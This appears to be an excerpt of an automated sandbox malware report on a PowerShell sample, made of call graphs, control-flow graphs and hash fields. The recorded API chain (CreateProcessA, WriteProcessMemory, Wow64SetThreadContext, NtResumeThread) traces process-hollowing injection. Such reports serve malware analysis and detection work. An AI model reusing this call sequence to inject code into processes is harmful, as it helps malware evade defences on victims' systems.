WriteProcessMemory 82970->82971 82972 30802e0 WriteProcessMemory 82970->82972 82971->82970 82972->82970 82974 3099025 82973->82974 82976 30802d8 WriteProcessMemory 82974->82976 82977 30802e0 WriteProcessMemory 82974->82977 82975 309907b 82976->82975 82977->82975 82979 3098602 82978->82979 82980 30802d8 WriteProcessMemory 82979->82980 82981 30802e0 WriteProcessMemory 82979->82981 82980->82979 82981->82979 82983 3098602 82982->82983 82984 30802d8 WriteProcessMemory 82983->82984 82985 30802e0 WriteProcessMemory 82983->82985 82984->82983 82985->82983 82987 3098602 82986->82987 82988 30802d8 WriteProcessMemory 82987->82988 82989 30802e0 WriteProcessMemory 82987->82989 82988->82987 82989->82987 82991 3098602 82990->82991 82992 30802d8 WriteProcessMemory 82991->82992 82993 30802e0 WriteProcessMemory 82991->82993 82992->82991 82993->82991 82995 3098602 82994->82995 82996 30802d8 WriteProcessMemory 82995->82996 82997 30802e0 WriteProcessMemory 82995->82997 82996->82995 82997->82995 82999 30985b3 82998->82999 83000 30802d8 WriteProcessMemory 82999->83000 83001 30802e0 WriteProcessMemory 82999->83001 83000->82999 83001->82999 83003 3098602 83002->83003 83004 30802d8 WriteProcessMemory 83003->83004 83005 30802e0 WriteProcessMemory 83003->83005 83004->83003 83005->83003 83007 3098602 83006->83007 83008 30802d8 WriteProcessMemory 83007->83008 83009 30802e0 WriteProcessMemory 83007->83009 83008->83007 83009->83007 83011 3098602 83010->83011 83011->83010 83012 30802d8 WriteProcessMemory 83011->83012 83013 30802e0 WriteProcessMemory 83011->83013 83012->83011 83013->83011 83015 3098b27 83014->83015 83099 3080960 83015->83099 83103 3080959 83015->83103 83016 3098602 83019 30802d8 WriteProcessMemory 83016->83019 83020 30802e0 WriteProcessMemory 83016->83020 83019->83016 83020->83016 83022 3098602 83021->83022 83023 30802d8 WriteProcessMemory 83022->83023 83024 30802e0 WriteProcessMemory 83022->83024 83023->83022 83024->83022 83026 3098602 83025->83026 83027 30802d8 WriteProcessMemory 83026->83027 83028 30802e0 WriteProcessMemory 83026->83028 83027->83026 83028->83026 83030 3098602 83029->83030 83031 30802d8 WriteProcessMemory 83030->83031 83032 30802e0 WriteProcessMemory 83030->83032 83031->83030 83032->83030 83034 3098602 83033->83034 83035 30802d8 WriteProcessMemory 83034->83035 83036 30802e0 WriteProcessMemory 83034->83036 83035->83034 83036->83034 83038 3098602 83037->83038 83039 30802d8 WriteProcessMemory 83038->83039 83040 30802e0 WriteProcessMemory 83038->83040 83039->83038 83040->83038 83042 3098b43 83041->83042 83043 3098602 83041->83043 83046 3080959 NtResumeThread 83042->83046 83047 3080960 NtResumeThread 83042->83047 83044 30802d8 WriteProcessMemory 83043->83044 83045 30802e0 WriteProcessMemory 83043->83045 83044->83043 83045->83043 83046->83043 83047->83043 83049 3098602 83048->83049 83050 30802d8 WriteProcessMemory 83049->83050 83051 30802e0 WriteProcessMemory 83049->83051 83050->83049 83051->83049 83053 3098602 83052->83053 83054 30802d8 WriteProcessMemory 83053->83054 83055 30802e0 WriteProcessMemory 83053->83055 83054->83053 83055->83053 83057 3098602 83056->83057 83058 30802d8 WriteProcessMemory 83057->83058 83059 30802e0 WriteProcessMemory 83057->83059 83058->83057 83059->83057 83061 3098602 83060->83061 83062 30802d8 WriteProcessMemory 83061->83062 83063 30802e0 WriteProcessMemory 83061->83063 83062->83061 83063->83061 83065 3098f08 83064->83065 83107 3099c98 83065->83107 83112 3099c88 83065->83112 83066 3098602 83067 30802d8 WriteProcessMemory 83066->83067 83068 30802e0 WriteProcessMemory 83066->83068 83067->83066 83068->83066 83072 3098602 83071->83072 83073 30802d8 WriteProcessMemory 83072->83073 83074 30802e0 WriteProcessMemory 83072->83074 83073->83072 83074->83072 83076 3098602 83075->83076 83077 30802d8 WriteProcessMemory 83076->83077 83078 30802e0 WriteProcessMemory 83076->83078 83077->83076 83078->83076 83080 3098602 83079->83080 83081 30802d8 WriteProcessMemory 83080->83081 83082 30802e0 WriteProcessMemory 83080->83082 83081->83080 83082->83080 83084 3080328 WriteProcessMemory 83083->83084 83086 308037f 83084->83086 83086->82929 83088 30802e0 WriteProcessMemory 83087->83088 83090 308037f 83088->83090 83090->82929 83092 309fdd5 Wow64SetThreadContext 83091->83092 83094 309fe1d 83092->83094 83094->82928 83096 309fd90 Wow64SetThreadContext 83095->83096 83098 309fe1d 83096->83098 83098->82928 83100 30809a8 NtResumeThread 83099->83100 83102 30809dd 83100->83102 83102->83016 83104 3080960 NtResumeThread 83103->83104 83106 30809dd 83104->83106 83106->83016 83108 3099caf 83107->83108 83117 3099e41 83108->83117 83122 3099eba 83108->83122 83113 3099caf 83112->83113 83115 3099eba 2 API calls 83113->83115 83116 3099e41 2 API calls 83113->83116 83114 3099cd1 83114->83066 83115->83114 83116->83114 83118 3099e50 83117->83118 83127 309f67c 83118->83127 83131 309f688 83118->83131 83123 3099edf 83122->83123 83125 309f688 CreateProcessA 83123->83125 83126 309f67c CreateProcessA 83123->83126 83124 3099cd1 83124->83066 83125->83124 83126->83124 83128 309f688 CreateProcessA 83127->83128 83130 309f874 83128->83130 83132 309f6ec CreateProcessA 83131->83132 83134 309f874 83132->83134 83134->83134 82752 74bc0a8 82753 74bc0bd 82752->82753 82758 74bc0db 82753->82758 82764 74bc0e8 82753->82764 82770 74bc1de 82753->82770 82754 74bc0d3 82759 74bc0e8 82758->82759 82760 74bc381 82759->82760 82761 74bc218 82759->82761 82776 74bc60b 82759->82776 82760->82754 82761->82760 82762 74bc60b 6 API calls 82761->82762 82762->82761 82767 74bc112 82764->82767 82765 74bc381 82765->82754 82766 74bc218 82766->82765 82768 74bc60b 6 API calls 82766->82768 82767->82765 82767->82766 82769 74bc60b 6 API calls 82767->82769 82768->82766 82769->82767 82772 74bc13d 82770->82772 82771 74bc381 82771->82754 82772->82771 82773 74bc218 82772->82773 82775 74bc60b 6 API calls 82772->82775 82773->82771 82774 74bc60b 6 API calls 82773->82774 82774->82773 82775->82772 82777 74bc625 82776->82777 82783 74bccbb 82777->82783 82788 74bd435 82777->82788 82794 74bd3da 82777->82794 82799 74bcefc 82777->82799 82784 74bccc1 82783->82784 82804 74be480 82784->82804 82808 74be47b 82784->82808 82789 74bd43f 82788->82789 82790 74bccbd 82788->82790 82792 74be47b CreateFileA 82790->82792 82793 74be480 CreateFileA 82790->82793 82791 74bcd01 82792->82791 82793->82791 82795 74bd3e0 82794->82795 82812 74bebdd 82795->82812 82816 74bebe0 82795->82816 82796 74bd416 82800 74bcf02 82799->82800 82820 74be874 82800->82820 82824 74be878 82800->82824 82805 74be4d2 CreateFileA 82804->82805 82807 74be57b 82805->82807 82809 74be480 CreateFileA 82808->82809 82811 74be57b 82809->82811 82813 74bebe0 MapViewOfFile 82812->82813 82815 74bec5d 82813->82815 82815->82796 82817 74bec20 MapViewOfFile 82816->82817 82819 74bec5d 82817->82819 82819->82796 82821 74be878 CreateFileMappingA 82820->82821 82823 74be971 82821->82823 82825 74be8cd CreateFileMappingA 82824->82825 82827 74be971 82825->82827
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3516284452.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_8620000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ,j#%$4
                                                                                                              • API String ID: 0-1316199114
                                                                                                              • Opcode ID: a5f973f17a4a609538e6c862d86ae96ef89116e4f7eedb5c9019de6ae2e75ef1
                                                                                                              • Instruction ID: cf732ce5e2fffb65783ceda010a174353c14aae1d786cf6505c3adde5118aeac
                                                                                                              • Opcode Fuzzy Hash: a5f973f17a4a609538e6c862d86ae96ef89116e4f7eedb5c9019de6ae2e75ef1
                                                                                                              • Instruction Fuzzy Hash: DCB2E574A00628DFDB18CFA8C894BADB7B6FB88301F158199E505AB3A5CB71ED41CF54

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1104 3080959-30809db NtResumeThread 1108 30809dd-30809e3 1104->1108 1109 30809e4-3080a09 1104->1109 1108->1109
                                                                                                              APIs
                                                                                                              • NtResumeThread.NTDLL(?,?), ref: 030809CE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3467046119.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_3080000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
                                                                                                              • Opcode ID: a511d8ce9a704eb9719fb2e435a160e101487f6a973d1aba7159d8a8079506e0
                                                                                                              • Instruction ID: 8faa15fd36a69bdaf03e6df694edb74f03229e335f1a507ce93daa87c0c91764
                                                                                                              • Opcode Fuzzy Hash: a511d8ce9a704eb9719fb2e435a160e101487f6a973d1aba7159d8a8079506e0
                                                                                                              • Instruction Fuzzy Hash: 1421E8B19002499BDB10DFAAD4457AEFBF4EF48324F14842AD559A7200CBB859448FA5
                                                                                                              APIs
                                                                                                              • NtResumeThread.NTDLL(?,?), ref: 030809CE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3467046119.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_3080000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
                                                                                                              • Opcode ID: 4b8ff74e6490ac1a694abed18b2c8afedeb3e4a6965554fed7dc4558cb0a16b7
                                                                                                              • Instruction ID: c8a09570f006b9bcf6caa58092dfac03dd72e579fa116755deca08e53de53e0e
                                                                                                              • Opcode Fuzzy Hash: 4b8ff74e6490ac1a694abed18b2c8afedeb3e4a6965554fed7dc4558cb0a16b7
                                                                                                              • Instruction Fuzzy Hash: EE111AB1D003499FEB10DFAAC44579EFBF4EF88324F14842AD559A7200CBB85944CFA5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3509483100.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_74b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a30612bb9834e78f37e20d3fb3fc70fb32517ac1d97dff0d120bffe2ccc77be6
                                                                                                              • Instruction ID: bcb99928d5a705d866dbfd038834f836e2ed552f89fa8e50c3ba6335fe67c7d4
                                                                                                              • Opcode Fuzzy Hash: a30612bb9834e78f37e20d3fb3fc70fb32517ac1d97dff0d120bffe2ccc77be6
                                                                                                              • Instruction Fuzzy Hash: 98E118B4D01218CFDB24CFA9C944BDEB7BAFB4A304F1084AAD409AB251D7749D85CFA5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3509483100.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_74b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1ee2575678427b9381fad31bb571ee7e63423837349f781fd5bde1a8fe0fe0f3
                                                                                                              • Instruction ID: 1af8b833c50ef33bb3bcebaab2bee9dc12175ca59d85707c6f8cbf1de5eaf826
                                                                                                              • Opcode Fuzzy Hash: 1ee2575678427b9381fad31bb571ee7e63423837349f781fd5bde1a8fe0fe0f3
                                                                                                              • Instruction Fuzzy Hash: CDE115B4E01218CFDB24CFA9D944BDEB7BAFB49300F1084AAD409AB251D7749D85CFA5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3510177904.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_74c0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 67ac34347ef96bac42a67208caf0ff4e0fe1d5543235aa9048a6afc47705b19f
                                                                                                              • Instruction ID: 9d1fab53372ce310109214a368f4a9986792704c92a168356ee6ce1f96190dbf
                                                                                                              • Opcode Fuzzy Hash: 67ac34347ef96bac42a67208caf0ff4e0fe1d5543235aa9048a6afc47705b19f
                                                                                                              • Instruction Fuzzy Hash: 25B1F7B8E02218CFDB95CFAAD584BEDBBF2BB49300F1490AAD509A7351D7705981CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3510177904.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_74c0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c3fc171bc5f29ef3a4b8c06450cc8580f9a3df6736707dc8dc1c11b67526421d
                                                                                                              • Instruction ID: f63ae8f94883703fd7d669ec5049e3651a9ef14b4cba3779502cde7ae7927679
                                                                                                              • Opcode Fuzzy Hash: c3fc171bc5f29ef3a4b8c06450cc8580f9a3df6736707dc8dc1c11b67526421d
                                                                                                              • Instruction Fuzzy Hash: 4DB1D6B8E01218CFDB95CFAAD584BEDBBF2BB49300F1490AAD509A7351D7705981CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3509483100.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_74b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fd57e450e6417c62cc4675eee0bbc263586ad67a4fea6289b4cb0e3b073854ac
                                                                                                              • Instruction ID: 8c4ee0717fec5a02d9baf9c0a4c12650b05fedb9057a33bac72da8abfffdf51f
                                                                                                              • Opcode Fuzzy Hash: fd57e450e6417c62cc4675eee0bbc263586ad67a4fea6289b4cb0e3b073854ac
                                                                                                              • Instruction Fuzzy Hash: 59913AB4E14218CFDB64DFA9D484BEDB7B2BB8A304F10806AD519AB340DB749D85CF64
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3509483100.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_74b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0c74ae8c99914326c1c22539e022e15a748ca9e10dfb47b0c99ebf545bbc47b7
                                                                                                              • Instruction ID: 3b4be6fa0a829934fd4abae34e4c7d6dbca9f36888dca1be72b8187e449fff15
                                                                                                              • Opcode Fuzzy Hash: 0c74ae8c99914326c1c22539e022e15a748ca9e10dfb47b0c99ebf545bbc47b7
                                                                                                              • Instruction Fuzzy Hash: 089128B4E14218CFDB64DFA9D484BEDB7B2BB8A304F10806AD519A7340DB749D85CF64
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3509483100.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_74b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ed74927b15f83d06e2f011cdec5df332caff0aa7a9bee5d5d83e30f8fd6f85ba
                                                                                                              • Instruction ID: 27391a84b2f0ab4594dedcf24f5226a993ad5a85bfc64cb2dfcd76c292578f03
                                                                                                              • Opcode Fuzzy Hash: ed74927b15f83d06e2f011cdec5df332caff0aa7a9bee5d5d83e30f8fd6f85ba
                                                                                                              • Instruction Fuzzy Hash: A09117B4E14218CFDB64DFA9D484BEDB7B2BB8A300F10806AD519AB340DB749D85CF64
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3510177904.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_74c0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e4a998b09f4ac99f328e8e3108c17ea753105953b99f12ce475079b1e64f515e
                                                                                                              • Instruction ID: 52c15ea403ac5900ed2e6c0e1f1f21d8d05e2f175fc96b7f20ca82f81725679f
                                                                                                              • Opcode Fuzzy Hash: e4a998b09f4ac99f328e8e3108c17ea753105953b99f12ce475079b1e64f515e
                                                                                                              • Instruction Fuzzy Hash: E3A105B8D01219CFEBA4CF69D984BADBBB2BB45304F25C4AED009AB251DB745985CF01
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3513661407.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_79a0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $aFi
                                                                                                              • API String ID: 0-3578558237
                                                                                                              • Opcode ID: 5fffc46151dd26c091866d72ac245b4e9b3c2a83f704852e2724cb54f50ba3c7
                                                                                                              • Instruction ID: 1c8ce261c5b53e6338c7c5a709873f10b3ac9b47f0809759c052db8011507801
                                                                                                              • Opcode Fuzzy Hash: 5fffc46151dd26c091866d72ac245b4e9b3c2a83f704852e2724cb54f50ba3c7
                                                                                                              • Instruction Fuzzy Hash: 89B2D3B0B01206EFDB25CBA8D840A6ABBF6EFC5318F14C46AD9159B351DB71D842CBD1

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 788 71568e0-7156912 789 71569b9-7156a02 788->789 790 7156918-715692e 788->790 794 7156a04-7156a0b 789->794 795 7156a48 789->795 791 7156930 790->791 792 7156933-7156946 790->792 791->792 792->789 797 7156948-7156955 792->797 799 7156a0d-7156a1a 794->799 800 7156a1c 794->800 798 7156a4b-7156a87 795->798 801 7156957 797->801 802 715695a-715696c 797->802 812 7156b03-7156b0e 798->812 813 7156a89-7156a92 798->813 803 7156a1e-7156a20 799->803 800->803 801->802 802->789 815 715696e-7156978 802->815 806 7156a27-7156a29 803->806 807 7156a22-7156a25 803->807 809 7156a2b-7156a38 806->809 810 7156a3a 806->810 808 7156a46 807->808 808->798 814 7156a3c-7156a3e 809->814 810->814 816 7156b10-7156b13 812->816 817 7156b1d-7156b3f 812->817 813->812 818 7156a94-7156a9a 813->818 814->808 820 7156986-71569b8 815->820 821 715697a-715697c 815->821 816->817 827 7156b45-7156b4e 817->827 828 7156c00-7156c4b 817->828 822 7156d34-7156da1 818->822 823 7156aa0-7156aad 818->823 821->820 836 7156db1-7156dea WriteProcessMemory 822->836 837 7156da3-7156daf 822->837 825 7156aaf-7156ad9 823->825 826 7156afa-7156b01 823->826 842 7156af6 825->842 843 7156adb-7156ade 825->843 826->812 826->818 827->822 832 7156b54-7156b89 827->832 860 7156c4e-7156cac 828->860 849 7156ba3-7156bb6 832->849 850 7156b8b-7156ba1 832->850 838 7156df3-7156e07 836->838 839 7156dec-7156df2 836->839 837->836 839->838 842->826 846 7156ae0-7156ae3 843->846 847 7156aea-7156af3 843->847 846->847 852 7156bb8-7156bbf 849->852 850->852 853 7156be4-7156bfa 852->853 854 7156bc1-7156bd2 852->854 853->827 853->828 854->853 859 7156bd4-7156bdd 854->859 859->853 866 7156cc6-7156cd9 860->866 867 7156cae-7156cc4 860->867 868 7156cdb-7156ce2 866->868 867->868 869 7156ce4-7156cea 868->869 870 7156cf1-7156cfb 868->870 869->870 870->860
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3503039093.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_7150000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f3c735a9276d9f047fda3e924860a59ca7c93b0ab379e4137555ebaa12d1ab0f
                                                                                                              • Instruction ID: e4b2d32c1daaffccfc31219e75f6218cd8741f665ff9c5d0c81e85575e8d5d74
                                                                                                              • Opcode Fuzzy Hash: f3c735a9276d9f047fda3e924860a59ca7c93b0ab379e4137555ebaa12d1ab0f
                                                                                                              • Instruction Fuzzy Hash: 630218B4A00209DFDB19CF98D484A9EFBB2FF48710F648559E918AB391C771ED81CB90

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 872 309f67c-309f6f8 875 309f6fa-309f704 872->875 876 309f731-309f751 872->876 875->876 877 309f706-309f708 875->877 883 309f78a-309f7c4 876->883 884 309f753-309f75d 876->884 878 309f72b-309f72e 877->878 879 309f70a-309f714 877->879 878->876 881 309f718-309f727 879->881 882 309f716 879->882 881->881 886 309f729 881->886 882->881 892 309f7fd-309f872 CreateProcessA 883->892 893 309f7c6-309f7d0 883->893 884->883 885 309f75f-309f761 884->885 887 309f763-309f76d 885->887 888 309f784-309f787 885->888 886->878 890 309f76f 887->890 891 309f771-309f780 887->891 888->883 890->891 891->891 894 309f782 891->894 903 309f87b-309f8c3 892->903 904 309f874-309f87a 892->904 893->892 895 309f7d2-309f7d4 893->895 894->888 897 309f7f7-309f7fa 895->897 898 309f7d6-309f7e0 895->898 897->892 899 309f7e2 898->899 900 309f7e4-309f7f3 898->900 899->900 900->900 902 309f7f5 900->902 902->897 909 309f8d3-309f8d7 903->909 910 309f8c5-309f8c9 903->910 904->903 911 309f8d9-309f8dd 909->911 912 309f8e7-309f8eb 909->912 910->909 913 309f8cb 910->913 911->912 914 309f8df 911->914 915 309f8fb 912->915 916 309f8ed-309f8f1 912->916 913->909 914->912 918 309f8fc 915->918 916->915 917 309f8f3 916->917 917->915 918->918
                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0309F862
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3467074571.0000000003090000.00000040.00000800.00020000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_3090000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0
                                                                                                              • Opcode ID: aff32d2738b12dd1543a02b89d222c361dbc4996a1fc653c3b98a25cd16dce73
                                                                                                              • Instruction ID: a09257bfcf6c7c61f0f29eb64a8c5040af9b143a23a03a01bfc0c0069cca7b7c
                                                                                                              • Opcode Fuzzy Hash: aff32d2738b12dd1543a02b89d222c361dbc4996a1fc653c3b98a25cd16dce73
                                                                                                              • Instruction Fuzzy Hash: AB813771D0125A9FEF50CFA9C8817AEFBF2AF48315F28812AE854E7244D7749891DB81

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 919 309f688-309f6f8 921 309f6fa-309f704 919->921 922 309f731-309f751 919->922 921->922 923 309f706-309f708 921->923 929 309f78a-309f7c4 922->929 930 309f753-309f75d 922->930 924 309f72b-309f72e 923->924 925 309f70a-309f714 923->925 924->922 927 309f718-309f727 925->927 928 309f716 925->928 927->927 932 309f729 927->932 928->927 938 309f7fd-309f872 CreateProcessA 929->938 939 309f7c6-309f7d0 929->939 930->929 931 309f75f-309f761 930->931 933 309f763-309f76d 931->933 934 309f784-309f787 931->934 932->924 936 309f76f 933->936 937 309f771-309f780 933->937 934->929 936->937 937->937 940 309f782 937->940 949 309f87b-309f8c3 938->949 950 309f874-309f87a 938->950 939->938 941 309f7d2-309f7d4 939->941 940->934 943 309f7f7-309f7fa 941->943 944 309f7d6-309f7e0 941->944 943->938 945 309f7e2 944->945 946 309f7e4-309f7f3 944->946 945->946 946->946 948 309f7f5 946->948 948->943 955 309f8d3-309f8d7 949->955 956 309f8c5-309f8c9 949->956 950->949 957 309f8d9-309f8dd 955->957 958 309f8e7-309f8eb 955->958 956->955 959 309f8cb 956->959 957->958 960 309f8df 957->960 961 309f8fb 958->961 962 309f8ed-309f8f1 958->962 959->955 960->958 964 309f8fc 961->964 962->961 963 309f8f3 962->963 963->961 964->964
                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0309F862
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3467074571.0000000003090000.00000040.00000800.00020000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_3090000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0
                                                                                                              • Opcode ID: 31cfe71e05379f22900e28710de15c71b1526ed677cbb5bde0456cb65dbe9ca6
                                                                                                              • Instruction ID: 2e00fb08b3643e0c9d3a38e1295b188b5a13d517896db9bdd97bf045fa3c7443
                                                                                                              • Opcode Fuzzy Hash: 31cfe71e05379f22900e28710de15c71b1526ed677cbb5bde0456cb65dbe9ca6
                                                                                                              • Instruction Fuzzy Hash: 41813871D0125A9FEF50DFA9C8817AEFBF2BF48315F28812AE854E7244D7748891DB81

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 965 74be47b-74be4de 968 74be4e0-74be4ea 965->968 969 74be517-74be579 CreateFileA 965->969 968->969 970 74be4ec-74be4ee 968->970 978 74be57b-74be581 969->978 979 74be582-74be5c2 969->979 971 74be511-74be514 970->971 972 74be4f0-74be4fa 970->972 971->969 974 74be4fe-74be50d 972->974 975 74be4fc 972->975 974->974 976 74be50f 974->976 975->974 976->971 978->979 984 74be5d2 979->984 985 74be5c4-74be5c8 979->985 987 74be5d3 984->987 985->984 986 74be5ca 985->986 986->984 987->987
                                                                                                              APIs
                                                                                                              • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 074BE569
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3509483100.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_74b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 823142352-0
                                                                                                              • Opcode ID: 482866fce069f0344fe2e19d1dcf5dfe69ec87a673f4aa6c9cee804f3251348c
                                                                                                              • Instruction ID: a33442d60a4a4d2088bb1b502ccd70e8a8adfec0304641eb17cbb8e5c957d588
                                                                                                              • Opcode Fuzzy Hash: 482866fce069f0344fe2e19d1dcf5dfe69ec87a673f4aa6c9cee804f3251348c
                                                                                                              • Instruction Fuzzy Hash: 394167B1D00269DFDB20CFA9C981BDEBFB1AF88710F14852AE815A6250DBB59851CB91

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 988 74be874-74be8d9 991 74be8db-74be8e5 988->991 992 74be912-74be96f CreateFileMappingA 988->992 991->992 993 74be8e7-74be8e9 991->993 1001 74be978-74be9b8 992->1001 1002 74be971-74be977 992->1002 994 74be8eb-74be8f5 993->994 995 74be90c-74be90f 993->995 997 74be8f9-74be908 994->997 998 74be8f7 994->998 995->992 997->997 1000 74be90a 997->1000 998->997 1000->995 1007 74be9ba-74be9be 1001->1007 1008 74be9c8 1001->1008 1002->1001 1007->1008 1009 74be9c0 1007->1009 1010 74be9c9 1008->1010 1009->1008 1010->1010
                                                                                                              APIs
                                                                                                              • CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 074BE95F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3509483100.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_74b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFileMapping
                                                                                                              • String ID:
                                                                                                              • API String ID: 524692379-0
                                                                                                              • Opcode ID: e5d0f65e7fafd815e993228c417cc5aff37e57e68836485738a707b7b94b6342
                                                                                                              • Instruction ID: 1af042ef2d2aa0205ba76488d8489ff70bbd83a701b3a2a25e163cf5b2db288b
                                                                                                              • Opcode Fuzzy Hash: e5d0f65e7fafd815e993228c417cc5aff37e57e68836485738a707b7b94b6342
                                                                                                              • Instruction Fuzzy Hash: 914178B1C00369DFEB20DFA9D8417EEBBB1AF89710F14852AE814A7240DB759845CB91
